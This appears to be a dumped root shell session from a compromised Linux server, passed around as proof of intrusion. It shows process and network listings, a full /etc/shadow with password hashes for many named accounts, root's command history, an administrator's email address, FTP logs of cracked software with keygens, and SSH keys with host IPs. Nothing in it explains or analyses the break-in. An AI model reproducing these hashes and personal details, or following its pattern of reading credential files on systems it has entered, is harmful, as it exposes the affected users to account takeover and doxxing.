Ss May05 10:45 /usr/sbin/named root 2236 0.0 0.5 2500 1248 ? S May05 0:00 /bin/sh /usr/bin/ mysql 4526 0.0 7.0 77744 17464 ? S May05 0:00 /usr/sbin/mysqld root 2914 0.0 0.1 1476 484 ? S May05 0:00 logger -p daemon. mysql 11911 0.0 7.0 77744 17464 ? S May05 0:34 /usr/sbin/mysqld mysql 11464 0.0 7.0 77744 17464 ? S May05 0:00 /usr/sbin/mysqld mysql 5970 0.0 7.0 77744 17464 ? S May05 0:00 /usr/sbin/mysqld mysql 26606 0.0 7.0 77744 17464 ? S May05 0:00 /usr/sbin/mysqld mysql 15247 0.0 7.0 77744 17464 ? S May05 0:00 /usr/sbin/mysqld mysql 3096 0.0 7.0 77744 17464 ? S May05 12:59 /usr/sbin/mysqld mysql 18129 0.0 7.0 77744 17464 ? S May05 7:06 /usr/sbin/mysqld mysql 9691 0.0 7.0 77744 17464 ? S May05 0:00 /usr/sbin/mysqld mysql 19984 0.0 7.0 77744 17464 ? S May05 0:00 /usr/sbin/mysqld mysql 12133 0.0 7.0 77744 17464 ? S May05 0:01 /usr/sbin/mysqld mysql 9802 0.0 7.0 77744 17464 ? S May05 0:02 /usr/sbin/mysqld root 19289 0.0 0.2 2220 728 ? Ss May05 0:14 /usr/sbin/inetd root 11711 0.0 0.6 3720 1544 ? Ss May05 0:05 /usr/sbin/sshd root 7545 0.0 0.3 1756 808 ? Ss May05 0:05 /usr/sbin/cron root 4927 0.0 2.1 10628 5368 ? Ss May05 0:54 /usr/bin/perl /us root 22753 0.0 2.6 16620 6608 ? S May05 1:14 /usr/sbin/apache root 19067 0.0 2.2 8732 5456 ? S May05 28:38 python /usr/bin/d root 14410 0.0 0.1 1484 472 tty1 Ss+ May05 0:00 /sbin/getty 38400 root 22055 0.0 0.1 1484 472 tty2 Ss+ May05 0:00 /sbin/getty 38400 root 15373 0.0 0.1 1484 472 tty3 Ss+ May05 0:00 /sbin/getty 38400 root 13138 0.0 0.1 1484 472 tty4 Ss+ May05 0:00 /sbin/getty 38400 root 28322 0.0 0.1 1484 472 tty5 Ss+ May05 0:00 /sbin/getty 38400 root 27969 0.0 0.1 1484 472 tty6 Ss+ May05 0:00 /sbin/getty 38400 root 8347 0.0 0.1 1484 476 ttyS0 Ss+ May05 0:00 /sbin/getty -L tt gumbie 13651 0.0 0.7 3660 1880 ? Ss May17 0:01 SCREEN -e^Tt gumbie 6449 0.0 0.6 3228 1720 pts/2 Ss+ May17 0:00 /bin/bash gumbie 23097 0.0 0.6 3212 1664 pts/4 Ss May20 0:00 /bin/bash root 16342 0.0 0.6 2652 1572 pts/4 S May27 0:00 -su root 11 0.0 0.2 2052 592 pts/4 T Jun01 0:18 tail -F /var/log/ gumbie 15453 0.0 0.6 3212 1664 pts/5 Ss Jun03 0:00 /bin/bash root 13262 0.0 0.6 2604 1488 pts/5 S Jun03 0:00 -su prototy 601 0.0 0.6 2584 1500 pts/5 S+ Jun03 0:00 -su www-data 25611 0.0 2.9 16876 7396 ? S Jun08 0:00 /usr/sbin/apache www-data 11373 0.0 3.0 16912 7536 ? S Jun08 0:00 /usr/sbin/apache www-data 16966 0.0 3.0 16908 7436 ? S Jun08 0:00 /usr/sbin/apache stax 26322 2.9 2.2 15220 5632 ? S Jun08 56:00 php msnbot.php ircd 25089 0.0 0.6 2612 1500 pts/4 S+ Jun09 0:00 -su www-data 17076 0.0 2.9 16864 7276 ? S Jun09 0:00 /usr/sbin/apache www-data 23265 0.0 2.7 16752 6688 ? S Jun09 0:00 /usr/sbin/apache www-data 12134 0.0 2.9 16864 7280 ? S Jun09 0:00 /usr/sbin/apache www-data 2976 0.0 2.7 16752 6688 ? S Jun09 0:00 /usr/sbin/apache www-data 1545 0.0 2.9 16864 7288 ? S Jun09 0:00 /usr/sbin/apache www-data 22567 0.0 2.7 16752 6768 ? S Jun09 0:00 /usr/sbin/apache www-data 32028 0.0 2.8 16760 7004 ? S Jun09 0:00 /usr/sbin/apache root 27808 0.0 0.8 7176 2172 ? Ss 00:50 0:00 sshd: djdd [priv] root 20818 0.0 0.8 7176 2172 ? S 00:50 0:00 sshd: djdd [priv] djdd 4329 0.0 0.9 7184 2240 ? S 00:50 0:00 sshd: djdd@pts/0 djdd 22316 0.0 0.6 3180 1668 pts/0 Ss 00:50 0:00 -bash root 9556 0.0 0.5 2584 1472 pts/0 S 00:53 0:00 -su root 25811 0.0 0.3 2480 852 pts/0 R+ 00:54 0:00 ps aux server4:~# netstat -anvp Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:5666 0.0.0.0:* LISTEN 19289/inetd tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 22753/apache tcp 0 0 0.0.0.0:10000 0.0.0.0:* LISTEN 4927/perl tcp 0 0 0.0.0.0:113 0.0.0.0:* LISTEN 19289/inetd tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 19289/inetd tcp 0 0 213.251.160.26:53 0.0.0.0:* LISTEN 28307/named tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN 28307/named tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 11711/sshd tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN 11711/sshd tcp 0 0 213.251.160.26:36826 207.46.107.79:1863 ESTABLISHED26322/php tcp 0 0 213.251.160.26:58125 207.46.26.197:1863 ESTABLISHED26322/php tcp 0 0 213.251.160.26:56634 207.46.27.67:1863 ESTABLISHED26322/php tcp 0 288 213.251.160.26:22 76.108.85.21:1688 ESTABLISHED27808/sshd: djdd [p tcp 0 0 213.251.160.26:56485 207.46.26.142:1863 ESTABLISHED26322/php udp 0 0 0.0.0.0:32768 0.0.0.0:* 28307/named udp 0 0 0.0.0.0:10000 0.0.0.0:* 4927/perl udp 0 0 213.251.160.26:53 0.0.0.0:* 28307/named udp 0 0 127.0.0.1:53 0.0.0.0:* 28307/named Active UNIX domain sockets (servers and established) Proto RefCnt Flags Type State I-Node PID/Program name Path unix 2 [ ACC ] STREAM LISTENING 282 28307/named /var/run/ndc unix 8 [ ] DGRAM 238 29859/syslogd /dev/log unix 2 [ ACC ] STREAM LISTENING 351 4526/mysqld /var/run/mysqld/mysqld.sock unix 2 [ ] DGRAM 15312755 4329/0 unix 3 [ ] STREAM CONNECTED 15312754 27808/sshd: djdd [p unix 3 [ ] STREAM CONNECTED 15312753 4329/0 unix 2 [ ] DGRAM 1098 4927/perl unix 2 [ ] DGRAM 999 4927/perl unix 2 [ ] DGRAM 349 2914/logger unix 2 [ ] DGRAM 280 28307/named unix 2 [ ] DGRAM 271 14962/klogd netstat: no support for `AF IPX' on this system. netstat: no support for `AF AX25' on this system. netstat: no support for `AF X25' on this system. netstat: no support for `AF NETROM' on this system. server4:~# cat /etc/shadow root:$1$Ycnj762I$8EX7DzphtLPPEnh7AA1FN1:13541:0:99999:7::: daemon:*:12529:0:99999:7::: bin:*:12529:0:99999:7::: sys:*:12529:0:99999:7::: sync:*:12529:0:99999:7::: games:*:12529:0:99999:7::: man:*:12529:0:99999:7::: lp:*:12529:0:99999:7::: mail:*:12529:0:99999:7::: news:*:12529:0:99999:7::: uucp:*:12529:0:99999:7::: proxy:*:12529:0:99999:7::: postgres:*:12529:0:99999:7::: www-data:*:12529:0:99999:7::: backup:*:12529:0:99999:7::: operator:*:12529:0:99999:7::: list:*:12529:0:99999:7::: irc:*:12529:0:99999:7::: gnats:*:12529:0:99999:7::: nobody:*:12529:0:99999:7::: identd:!:12529:0:99999:7::: sshd:!:12529:0:99999:7::: stax:$1$Rj0PaaoN$vt..3umW5auOBtwu0yDT10:13647:0:99999:7::: gumbie:$1$ImYTO/K/$2D1HVxm7iSSap/oReQ6aw0:13596:0:99999:7::: mysql:!:13541:0:99999:7::: hlds:$1$SwHx08vh$AMVPLX4zHY8LfqrFXRO/e/:13581:0:99999:7::: www:$1$RWNlTHOr$4w.MlTSdRd2ouG4Iw7AHy0:13558:0:99999:7::: xposedbones:$1$nVhIWkli$NtGy8.YOTF5JkaEtpcmZA1:13602:0:99999:7::: djdd:$1$9/zyY8fR$GeOd4OQ3bR/zacmTSO/eI.:13643:0:99999:7::: ircd:$1$AlG2jcBf$v9PXz1QSwmz9tFE4s9apl/:13547:0:99999:7::: nagios:$1$PQHBNCj/$wzFXTDJeluPLGzkWs03zI.:13551:0:99999:7::: yumiro:$1$Gwmo8wbf$MuiHL3C4dqnbOSMraCEaH0:13557:0:99999:7::: misterinfo:$1$wKm3cgNu$kGovmOlqFq3nudFEUaIBO.:13560:0:99999:7::: chat:$1$kkneKyBR$chmW4CO.RNtpIOx4Cnjmy.:13600:0:99999:7::: madstorm:$1$5.2bzoRU$vfaoUUJEGCqvXAJEk2a7o/:13604:0:99999:7::: poe:$1$TQV5Sytj$uIDY8mXNj5HRJi1/XuXA10:13606:0:99999:7::: gnomex:$1$w40//R6K$J9MbUU6Mr4rHQbM.YlbTk.:13616:0:99999:7::: prototype:$1$nL.Omo1M$uXS9IlD5giKHkgjnrrWOa1:13618:0:99999:7::: server4:~# cd ~root server4:~# ls -alh total 168K drwx------ 14 root root 4.0K Jun 1 06:58 . drwxr-xr-x 21 root root 4.0K Feb 13 02:25 .. -rw------- 1 root root 7.6K May 27 19:18 .bash_history -rw-r--r-- 1 root root 393 Nov 22 2004 .bashrc drwx------ 2 root root 4.0K Feb 5 23:23 .elinks drwxr-xr-x 3 root root 4.0K Jan 28 17:49 .emacs.d -rw-r--r-- 1 root root 29 Jan 28 14:21 .email drwx------ 2 root root 4.0K Feb 12 01:09 .gconf drwx------ 2 root root 4.0K Feb 12 01:10 .gconfd drwx------ 2 root root 4.0K Feb 12 01:09 .gnome drwx------ 3 root root 4.0K Feb 12 01:09 .gnome2 drwx------ 2 root root 4.0K Feb 12 01:09 .gnome2_private -rw-r--r-- 1 root root 5 Jan 28 14:21 .mdg -rw------- 1 root root 159 May 20 09:01 .nano_history drwxr-xr-x 2 root root 4.0K Mar 27 19:05 .ncftp -r-------- 1 root root 9 Jan 28 14:21 .p -rw-r--r-- 1 root root 202 Nov 22 2004 .profile drwx------ 2 root root 4.0K Feb 13 02:41 .ssh drwxr-x--- 2 root root 4.0K Jan 28 21:12 .steam -rw------- 1 root root 5.6K Feb 3 16:24 .viminfo -rw-r--r-- 1 root root 8 Feb 21 2005 .vimrc drwxr-xr-x 4 root root 4.0K Feb 3 23:49 New -rw-r--r-- 1 root root 40K Jan 28 14:21 install_rtm.sh -rw-r--r-- 1 root root 1.4K Jun 13 2005 installer_la_cle-with-check.sh -rw-r--r-- 1 root root 21K Jan 28 23:54 meh.txt drwxr-xr-x 2 root root 4.0K Jun 1 06:23 snort server4:~# cat .bash_history w df -h apt-get apt-get install *sudo* apt-get install sudo* apt-get update apt-get install sudo* cd /etc/ emacs yum install emacs* apt-get install emacs* apt-get install *emacs* w apt-get install emac* apt-get upd apt-get install pico* vi vi /etc/apt/sources.list apt-get update apt-get update apt-get update apt-get install emacs* apt-get install emac* apt-get install emac* apt-get apt-get check apt-get autoclean apt-get apt-get update apt-get emacs apt-get install emacs w cd / wget http://www.zloche.net/sources.list cd /etc/apt/ ls mv sources.list sources.list__BACKUP mv /sources.list ./ ls apt-get update apt-get update apt-get install emacs* apt-get install emacs apt-get install emacs21* apt-get install emacs21 emacs cd/ cd / cd /home/ ls adduser cd /etc/sudoers emacs /etc/sudoers adduser hostname hostname apt-get install apache apt-get install phpmyadmin w top top ls pwd top > meh.txt less meh.txt /etc/init.d/bind /etc/init.d/bind stop /etc/init.d/mysql status /etc/init.d/mysql restart top top w top top w top cd /home/hlds/ ls cd ts cd addons/ cd amxmodx cd configs/ emacs plugins.ini w emacs plugins.ini w chmod 777 -R ./ w chmod 666 /dev/ptmx chmod 666 /dev/null ls -l /dev/null less .bash_history w dmesg man hlds man -k man hlds_run ls ~hlds top tail -f /var/log/debug tail -f /var/log/daemon.log tail -f /var/log/kern.log top cd New/openssl-0.9.8d ls make make install cd ../new w ssh server1.zloche.net ssh zloche.zapto.org cd /etc/ ls cd ssh/ ls less less sshd_config less sshd_config emacs ssh_config emacs sshd_config /etc/init.d/webmin /etc/init.d/webmin start apt-get install webmin locate webmin cd ~stax/ finger gumbie ls wget http://prdownloads.sourceforge.net/webadmin/webmin_1.320_all.deb ls dpkg webmin_1.320_all.deb dpkg --help dpkg -i webmin_1.320_all.deb locate webmin cd /etc/webmin/ ls emacs miniserv.conf emacs miniserv.users link links w w top ssh stax@zloche.zapto.or ssh stax@zloche.zapto.org top free -m ssh stax@www.zloche.net top su hlds w w free cd /usr/src/linux ssh stax@www.zloche.net cat /proc/version su stax adduser ircd ls ~ircd adduser nagios pico /etc/passwd mv /home/nagios/ /usr/local uname -a df ls ~nagios su - nagios su - ircd pico /etc/hosts.deny pico /etc/hosts.deny tail -f /var/log/denyhosts fg id cd /etc/bind ls ls -l ls pico named.conf pico named.conf.local man bind man named.conf ls mkdir slave pico named.conf.local host server3.zloche.net host irc.zloche.net pico named.conf.local pwd ls slave ls -l rndc reload /etc/init.d/bind reload ps aux | grep named /etc/init.d/bind stop /etc/init.d/bind start ps aux | grep named ls slave ls slave/rmachine.net.hosts less slave/rmachine.net.hosts ping server4 ping server3 dig rmachine.net ns less named.conf less named.conf.local DD ssh gumbie@server4 tail -F /var/log/messages tail -F /var/log/messages /var/log/auth.log fg mkdir New cd New elinks www.google.com ls fg ls tar -xzf openssl-0.9.8d.tar.gz cd openssl-0.9.8d ./configure ls ./Configure ./config make make install cd .. ls -l pico /etc/services ls /etc/inetd.conf pico /etc/inetd.conf which tcpd pico /etc/inetd.conf cp ~nagios/bin/nrpe /usr/sbin ls -l /usr/sbin/nrpe ps auxww | grep inetd /etc/init.d/inetd reload fg fg ls /var/log ls ~nagios/var ls ~nagios ls ~nagios/bin ./nrpe -h pico /etc/inetd.conf /etc/init.d/inetd reload fg fg pico /etc/resolv.conf fg ls ldconfig elinks www.openssl.org tar -xzf openssl-0.9.8d.tar.gz cd oepn cd openssl-0.9.8d ./configure ./config make ls /usr/local/ssl/lib make install ls /usr/local/ssl/lib less /usr/local/ssl/lib/pkgconfig/libssl.pc less /usr/local/ssl/lib/pkgconfig/* pico /etc/ld.so.conf ldconfig ls find . -name "libssl*" less FAQ less PROBLEMS ./configure --help | grep shared ./config --help | grep shared ./config shared make . ls /usr/local/ssl ls /usr/local/ssl/lib ls /usr/local/ssl/lib ldconfig apt-get install make apt-get install gcc apt-get install ssl apt-get install openssl apt-get install openssl-dev apt-get install openssl-devel apt-cache search openssl|less apt-get install libssl0.9.7 apt-get install ping apt-get install iputils-ping ping -h cd .. cd fg locate denyhosts apt-cache search denyhosts cd New mv ~gumbie/DenyHosts-2.6.tar.gz . tar -xzf DenyHosts-2.6.tar.gz ls cd DenyHosts-2.6 ls less README.txt python setup.py install apt-get install python python apt-cache search python | grep 2.3 apt-cache search python | grep 2.3 | grep lib less README.txt ls python setup.py install ls /usr/lib/python2.3 apt-cache search python | grep 2.3 | grep lib| less apt-get install python2.3-dev python setup.py install ls /usr/share/denyhosts/ ln -s /usr/share/denyhosts /etc cd /etc/denyhosts cp denyhosts.cfg-dist denyhosts.cfg pico denyhosts.cfg less /var/log/messages less /var/log/auth.log pico denyhosts.cfg less /var/log/auth.log pico denyhosts.cfg ls pico daemon-control-dist cp daemon-control-dist daemon-control pico dam pico daemon-control pico daemon-control cp -P daemon-control /etc/init.d/ cd /etc/rc3 cd /etc/rc3.d/ ls ls -l ln -s ../init.d/daemon-control S99 rm S99 mv ../init.d/daemon-control ../init.d/denyhosts ln -s ../init.d/denyhosts S99denyhosts cd ../rc4.d ls ln -s ../init.d/denyhosts S99denyhosts cd ../rc5.d ls -l ln -s ../init.d/denyhosts S99denyhosts cd ../rc6.d ls ln -s ../init.d/denyhosts K21denyhosts cd ../rc0.d/ ln -s ../init.d/denyhosts K21denyhosts ls -l cd ../rc1.d/ ls ln -s ../init.d/denyhosts K21denyhosts cd ../rc2.d/ ls ln -s ../init.d/denyhosts K21denyhosts ps aux | grep init ls rm K21 rm K21denyhosts ln -s ../init.d/denyhosts S99denyhosts ls ../rc1.d/ cd fg /etc/init.d/denyhosts start fg fg tail -F /var/log/messages /var/log/auth.log /var/log/kern.log free ls /etc/security/ ls /etc/security/time.conf less /etc/security/time.conf grep kill * less install_rtm.sh grep kill * less install_rtm.sh crontab -l ls /etc/crontab less /etc/crontab man rtm pico /etc/crontab /etc/init.d/cron restart fg ls tail -F /var/log/messages /var/log/auth.log /var/log/kern.log cat /etc/crontab id cd ~nagios ls ls bin ls etc mkdir -p tmp/etc cp etc/nsca.cfg tmp/etc cp etc/ndo2db.cfg tmp/etc cp etc/ndomod.cfg tmp/etc cd tmp ls ../bin ls ../libexec ls .. ls ls ../etc ls ../etc/nrpe.cfg etc cp ../etc/nrpe.cfg etc ls -l chown -R nagios.nagios * ls -l tar -czf NagiosAgent_nrpe.tgz * tar -tzf NagiosAgent_nrpe.tgz mv NagiosAgent_nrpe.tgz .. cd .. chown -R nagios.nagios NagiosAgent_nrpe.tgz rmdir tmp ls tmp rm -rf tmp ls ls ndoutils-1.4b2/ ls ndoutils-1.4b2/src/ ls -l passwd nagios fg ls mv NagiosAgent_nrpe.tgz ~gumbie chown gumbie ~gumbie/NagiosAgent_nrpe.tgz fg fg pico /etc/denyhosts/data/allow-hosts pico /etc/denyhosts/denyhosts.cfg mv /etc/denyhosts/data/allow-hosts /etc/denyhosts/data/allowed-hosts ls /etc/denyhosts/data/ ls ~gumbie fg pico .bash_history grep vfr .bash_history cd /var/bin cd /etc/bind ls cat named.conf.local ls -l slave/ fg dd apt-cache search ncftp apt-get install ncftp2 ncftp server3 ncftp -u server3 ncftp -u server3 ls ls Xlinx/ ls mv Xlinx/ ~gumbie chown gumbie ~gumbie/Xlinx/ chown -R gumbie ~gumbie/Xlinx/ ls /etc/init.d/squid status ls /etc/init.d/squid start ls /etc/init.d/squid /etc/init.d/squid start ps auxww | grep squid pico /etc/squid/squid.conf /etc/init.d/squid stop id cd /etc/bind ls cd slave/ ls less zloche.net.hosts dig zloche.net ns whois zloche.net | less dig zloche.net soa cd .. ls less named.conf less named.conf.options less named.conf.local ls /home cd /usr/local/nagios/ ls tar -czf copyOfInstall.tgz * scp copyOfInstall.tgz nagios@irc.liveits.com:. pico ~/.ssh/known_hosts scp copyOfInstall.tgz nagios@irc.liveits.com:. ls rm copyOfInstall.tgz crontab -l crontab nagios -l crontab -l nagios crontab -u nagios -l server4:~# cat .email leclairalexandre@hotmail.com server4:~# cat .nano_history nasgios nagios lock LOCK _LOCK lock_ run allow-hosts allow 207 207. 65.95 65.94 65.9 bas2 .pid pid denyhosts.lock denyhosts_lock acl mynet ournet my password server4:~# cd ../.ncftp server4:~/.ncftp# ls -alh total 24K drwxr-xr-x 2 root root 4.0K Mar 27 19:05 . drwx------ 14 root root 4.0K Jun 1 06:58 .. -rw------- 1 root root 145 Mar 27 19:05 bookmarks -rw-r--r-- 1 root root 59 Mar 27 19:05 history -rw-r--r-- 1 root root 697 Mar 27 19:03 log -rw-r--r-- 1 root root 312 Mar 27 19:05 prefs server4:~/.ncftp# cat * NcFTP bookmark-file version: 7 Number of entries: 1 server3,server3,gumbie,,,/home/gumbie,I,,46094ed6,1,1,0,1,80.248.208.223,,213494,61224,2,0,S quit ls ls pwd cd ~gumbie ls get -R Electronics_Apps/ quit server3 at Tue Mar 27 18:52:26 2007 server3 at Tue Mar 27 18:52:47 2007 get 43.66 MB ftp://server3/home/gumbie/Electronics_Apps/Xlinx/Xilinx.ChipScope.Pro.v8.2.03i.Incl.Keymaker-ZWT.rar get 45.51 MB ftp://server3/home/gumbie/Electronics_Apps/Xlinx/Xilinx.ChipScope.Pro.v8.2.03i.Linux.Incl.Keymaker-ZWT.rar get 56.73 MB ftp://server3/home/gumbie/Electronics_Apps/Xlinx/Xilinx.PlanAhead.v8.2.3-ZWT.rar get 62.33 MB ftp://server3/home/gumbie/Electronics_Apps/Xlinx/Xilinx.PlanAhead.v8.2.3.Linux-ZWT.rar get 256.00 kB ftp://server3/home/gumbie/Electronics_Apps/Xlinx/Xten.Networks.X-Pro.v2.2.2.ALL.PPC.Retail-DVTPDA/Xten.Networks.X-Pro.v2.2.2.ALL.PPC.Retail-DVTPDA/d-000xt.rar anonopen 1 anonpass gumbie@server4.zloche.net blank-lines 1 ftp-mode 0 logsize 10240 maxbookmarks 0 pager /bin/more progress-meter 2 remote-msgs 0 startup-lcwd startup-msgs 3 timeout 600 trace 0 utime 1 visual 1 show-trailing-space 0 total-runs 3 total-xfer-hundredths-of-seconds 61224 total-xfer-kbytes 213494 server4:~/.ncftp# cd ../.ssh server4:~/.ssh# ls -alh total 24K drwx------ 2 root root 4.0K Feb 13 02:41 . drwx------ 14 root root 4.0K Jun 1 06:58 .. -rw------- 1 root root 509 Feb 21 2005 authorized_keys2 -rw-r--r-- 1 root root 4.4K May 27 13:27 known_hosts -rw-r--r-- 1 root root 3.0K Feb 9 02:48 known_hosts~ server4:~/.ssh# cat * from="213.186.50.100" ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAt3XaIhEoRK5sEKm6wtYyazLOx3w+Yv9+bpfEvLftH r2hxZ2TY2A655iwMbgvhHqsMuGEjK9yGkZIQbUgB6HvOgOWOwJSX6Gc9Ac7GuH11xSU8t HDuTQot6fVtgcm2Y/VUFi65Knz9rLHz7h/Zy29ek+UYav5T7juhBIuk57cDxs= root@cache.ovh.net from="::ffff:213.186.50.100" ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAt3XaIhEoRK5sEKm6wtYyazLOx3w+Yv9+bpfEvLftH r2hxZ2TY2A655iwMbgvhHqsMuGEjK9yGkZIQbUgB6HvOgOWOwJSX6Gc9Ac7GuH11xSU8t HDuTQot6fVtgcm2Y/VUFi65Knz9rLHz7h/Zy29ek+UYav5T7juhBIuk57cDxs= root@cache.ovh.net localhost ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAxgnjMIPg1s3fGZPAtyFjtcDUGX6my1X7YFYnlv1y9 PL78if+wsBgT6SY9WWtqeu1owAjCMeMHPfU3GMV9Q5dGD74CSENGpfzMr8vrFc+D8yqj9 vS080AFByxp/NN9AFYFUn4c7rYfdnPzBt/ur5f51KzlVyhV++TcSBX4rToqxM= 10.48.100.81 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAwDm7jfhCI0rtwj5/Wpv3AvHN81RKb3lFALFhtl80i 1KB2pMlBJNRuAkgvkPFpleyKEHol6tYuMSMCn6qiV4rKJ1wcKoTyVlYNl296381PYdYNX SlA58SD4ErWx5Ttz45iAJL8I/2ToxGOX0k1abAIEPiaCKIsf1k7/23jBkWjlE= www.zloche.net,80.248.208.223 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzYgpHj6TWctv9JPyCM/uWdHMWWgnMmR9KkDXZuiGV SNc/FyxIq6soDPhQ6nsYw3NoKEczB1aC6u1RMqueWyd0LLZD2QIVmJ1ijRtQDibKXEmlq uOTUNZzB0RQIKgI4FOlpojpqTMziRUom2qChYoVBFLimYvH+b3fclaQaSichE= 81.93.5.180 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAtSbs8/VCyV0KAFHWmggnC3QHa2qh9AYdUYE4OrbUK 7oA4Ozq8D5V2GYhBmpkMvYcCENNi7cxyeTEMdEeBWok/zRcxRkGYAxM7Zg2NsbIez9+bB 1ojKy5BoNLsocoQbvzgVbxOXHvRwcWTGK9H7Yq8ZJPLC4ezsOpAcyTeBHEeuM= 66.168.220.212 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAtmDaXUYBfpbI9nFkhEnqjRxLMWLxfkDdxeKDMs5or hRjRa8GQ1AC3KpC7y+TaonfUM/dSXR0+1K1BJUtTAWxe5ZeCDKL4phDbubxDIJvFKcTfN i+bjiwkHlz1OKDThvqtRt781wcJRnSbnXinhZk8Ia3v6AIHsoB5x/yljSwznrSDWuVwn5 LSkNtISOiOX91ItfxwKi8B0ZgSBdUkmAHqMyej98cRVvY/iATI5SrFRCfWNkC7gH/oFxX M/bKB94H7TZ4W6wtfdjmkBrYxojDbUKKEfd1LywcJCTYxab8usl+Q39uYvqTfXwJDIYX+ BE810BNmXi0QA6WlYUOpMJj9Q== server4.zloche.net,213.251.160.26 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA1nrkiWUjg+BGB83ed97xlvJYWNm8FeE91nhXx05mZ 4HVDADi0qGmYnlXbuywe7Kf4R42C5Gw+ZLMKdMYCsDqa89dqNuSl0Mx7/qHPS3oQW/nPF C8cFo1pI6v/R180uxorB5ggcLV4mgbZZnc4TltUMbrLRHYfAi3HbwGj6bIiuE= zloche.zapto.org ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAt9hfTe460T8l2oPkq3WD7fnie6fzIWH9ep1HX8NVS zLFT+fUlLzgpWUU+g1HycYAV4S5nSfG3FSsPfeEETXzBaaYeAU87qn3vtjuRU7Fp5Tv6m PnFiOJuDwJ4wG3yA8+oyRzTMThfhnGDP+H90eacVPjxoTN0lQiM3VvmhR4j9rTfaVkx9B DmUz2sorEMAHcpajK3h2dB124tiNR/IggGvXmwPUJym10O1QZKVrjCkdbacz9zV4ROmc5 c/hucKGwZH9mOW+Zo1GB2OP7LHMPPCmO7qymvG67eOsyc/QmBQcsqBSPYmC1xNms9c6cb nZeUvjYFY0rfQql39oytXeJ7w== server4 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA1nrkiWUjg+BGB83ed97xlvJYWNm8FeE91nhXx05mZ 4HVDADi0qGmYnlXbuywe7Kf4R42C5Gw+ZLMKdMYCsDqa89dqNuSl0Mx7/qHPS3oQW/nPF C8cFo1pI6v/R180uxorB5ggcLV4mgbZZnc4TltUMbrLRHYfAi3HbwGj6bIiuE= server3 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzYgpHj6TWctv9JPyCM/uWdHMWWgnMmR9KkDXZuiGV SNc/FyxIq6soDPhQ6nsYw3NoKEczB1aC6u1RMqueWyd0LLZD2QIVmJ1ijRtQDibKXEmlq uOTUNZzB0RQIKgI4FOlpojpqTMziRUom2qChYoVBFLimYvH+b3fclaQaSichE= server1.zloche.net,65.92.158.240 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAt9hfTe460T8l2oPkq3WD7fnie6fzIWH9ep1HX8NVS zLFT+fUlLzgpWUU+g1HycYAV4S5nSfG3FSsPfeEETXzBaaYeAU87qn3vtjuRU7Fp5Tv6m PnFiOJuDwJ4wG3yA8+oyRzTMThfhnGDP+H90eacVPjxoTN0lQiM3VvmhR4j9rTfaVkx9B DmUz2sorEMAHcpajK3h2dB124tiNR/IggGvXmwPUJym10O1QZKVrjCkdbacz9zV4ROmc5 c/hucKGwZH9mOW+Zo1GB2OP7LHMPPCmO7qymvG67eOsyc/QmBQcsqBSPYmC1xNms9c6cb nZeUvjYFY0rfQql39oytXeJ7w== server1 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAt9hfTe460T8l2oPkq3WD7fnie6fzIWH9ep1HX8NVS zLFT+fUlLzgpWUU+g1HycYAV4S5nSfG3FSsPfeEETXzBaaYeAU87qn3vtjuRU7Fp5Tv6m PnFiOJuDwJ4wG3yA8+oyRzTMThfhnGDP+H90eacVPjxoTN0lQiM3VvmhR4j9rTfaVkx9B DmUz2sorEMAHcpajK3h2dB124tiNR/IggGvXmwPUJym10O1QZKVrjCkdbacz9zV4ROmc5 c/hucKGwZH9mOW+Zo1GB2OP7LHMPPCmO7qymvG67eOsyc/QmBQcsqBSPYmC1xNms9c6cb nZeUvjYFY0rfQql39oytXeJ7w== 65.94.126.14 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAt9hfTe460T8l2oPkq3WD7fnie6fzIWH9ep1HX8NVS zLFT+fUlLzgpWUU+g1HycYAV4S5nSfG3FSsPfeEETXzBaaYeAU87qn3vtjuRU7Fp5Tv6m PnFiOJuDwJ4wG3yA8+oyRzTMThfhnGDP+H90eacVPjxoTN0lQiM3VvmhR4j9rTfaVkx9B DmUz2sorEMAHcpajK3h2dB124tiNR/IggGvXmwPUJym10O1QZKVrjCkdbacz9zV4ROmc5 c/hucKGwZH9mOW+Zo1GB2OP7LHMPPCmO7qymvG67eOsyc/QmBQcsqBSPYmC1xNms9c6cb nZeUvjYFY0rfQql39oytXeJ7w== www.zloche.com ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAtSbs8/VCyV0KAFHWmggnC3QHa2qh9AYdUYE4OrbUK 7oA4Ozq8D5V2GYhBmpkMvYcCENNi7cxyeTEMdEeBWok/zRcxRkGYAxM7Zg2NsbIez9+bB 1ojKy5BoNLsocoQbvzgVbxOXHvRwcWTGK9H7Yq8ZJPLC4ezsOpAcyTeBHEeuM= 127.0.0.1 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA1nrkiWUjg+BGB83ed97xlvJYWNm8FeE91nhXx05mZ 4HVDADi0qGmYnlXbuywe7Kf4R42C5Gw+ZLMKdMYCsDqa89dqNuSl0Mx7/qHPS3oQW/nPF C8cFo1pI6v/R180uxorB5ggcLV4mgbZZnc4TltUMbrLRHYfAi3HbwGj6bIiuE= irc.liveits.com,68.117.250.132 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA4BAf00qd6FUDb41gGvjrAzt4fl7T52sPSZt6rj7sm 8JmBZcwiZbQLos4WWQ9C8EeWRwk8mP7DmoHapC8qs/PIfUOturidZUPWIpn/RQ5E/BiVy 